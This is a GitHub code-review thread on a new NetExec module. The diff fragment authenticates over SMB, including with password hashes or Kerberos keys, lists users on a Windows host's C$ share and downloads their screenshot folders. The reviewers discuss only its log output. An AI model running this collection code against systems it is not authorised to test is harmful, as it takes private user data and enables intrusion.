nxc/modules/snipped.py

```diff
@@ -0,0 +1,126 @@
+        self.context = context
+        self.connection = connection
+        self.share = "C$"
+
+        self.hostname = connection.hostname
+        self.domain = connection.domain
+        self.username = connection.username
+        self.password = getattr(connection, "password", "")
+        self.host = connection.host
+        self.kerberos = connection.kerberos
+        self.lmhash = getattr(connection, "lmhash", "")
+        self.nthash = getattr(connection, "nthash", "")
+        self.aesKey = connection.aesKey
+        self.use_kcache = getattr(connection, "use_kcache", False)
+
+        target = Target.create(
+            domain=self.domain,
+            username=self.username,
+            password=self.password,
+            target=self.hostname + "." + self.domain if self.kerberos else self.host,
+            lmhash=self.lmhash,
+            nthash=self.nthash,
+            do_kerberos=self.kerberos,
+            aesKey=self.aesKey,
+            no_pass=True,
+            use_kcache=self.use_kcache,
+        )
+
+        dploot_conn = self.upgrade_connection(target=target, connection=connection.conn)
+
+        output_base_dir = join(NXC_PATH, "modules", "snipped", "screenshots")
+        os.makedirs(output_base_dir, exist_ok=True)
+
+        context.log.debug("Getting all user folders")
+        try:
+            user_folders = dploot_conn.listPath(self.share, "\\Users\\*")
+        except Exception as e:
+            context.log.fail(f"Failed to list user folders: {e}")
+            return
+
+        context.log.debug(f"User folders: {user_folders}")
+        if not user_folders:
+            context.log.fail("No User folders found!")
+            return
+        else:
+            context.log.display("Attempting to download screenshots if existent.")
+
+        for user_folder in user_folders:
+            if not user_folder.is_directory():
+                continue
+            folder_name = user_folder.get_longname()
+            if folder_name in [".", "..", "All Users", "Default", "Default User", "Public"]:
+                continue
+            if self.users and folder_name not in self.users:
+                continue
+
+            screenshot_path = ntpath.normpath(join(r"Users", folder_name, self.screenshot_path_stub))
+            try:
+                screenshot_files = dploot_conn.listPath(self.share, screenshot_path + "\\*")
+            except Exception as e:
+                context.log.debug(f"Screenshot folder {screenshot_path} not found for user {folder_name}: {e}")
+                continue
+
+            if not screenshot_files:
+                context.log.debug(f"No screenshots found in {screenshot_path} for user {folder_name}")
+                continue
+
+            user_output_dir = join(output_base_dir, folder_name)
+            os.makedirs(user_output_dir, exist_ok=True)
+
+            context.log.display(f"Downloading screenshots for user {folder_name}")
```

Comment:
And this one probably as well. Just having the info that we successfully downloaded screenshots would be best imo

Reply:
Module output has been reworked, now the module just displays how many files were downloaded from which host. Nothing will be output if no files were downloaded:

![image](https://github.com/user-attachments/assets/e6aa92ad-cb17-430a-9e54-0ba11efc45c5)

Reply:
Great, looking good. 
Changed `.error` to `.fail`, because this is more appropriated in this context (it is not logic that is breaking, rather it fails to retrieve data).
![image](https://github.com/user-attachments/assets/e31b2e25-b666-438b-93ac-e3d0e0173d9a)